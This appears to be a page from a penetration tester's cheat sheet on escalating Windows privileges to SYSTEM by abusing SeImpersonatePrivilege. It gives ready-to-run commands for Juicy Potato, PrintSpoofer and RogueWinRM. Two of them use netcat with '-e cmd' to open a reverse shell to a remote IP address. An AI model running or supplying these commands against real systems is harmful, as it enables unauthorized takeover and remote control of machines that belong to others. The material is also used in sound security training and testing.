SeImpersonatePrivilege

If you have this permission you are most likely a service account and you will %99 end up as NT Authority/System

If the operating system version is <= windows server 2016 use Juicy Potato else use PrintSpoofer

Juicy Potato

Pick one CLSID from here according to your system

Download the Juicy Potato binary from here

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

RoguePotato

I have never played with this one but should work in most of the cases

PrintSpoofer

.\PrintSpoofer.exe -i -c cmd

.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"

RogueWinRM

.\RogueWinRM.exe -p C:\windows\system32\cmd.exe

.\RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"
PreviousSeBackupPrivilegeNextSeDebugPrivilege

Last updated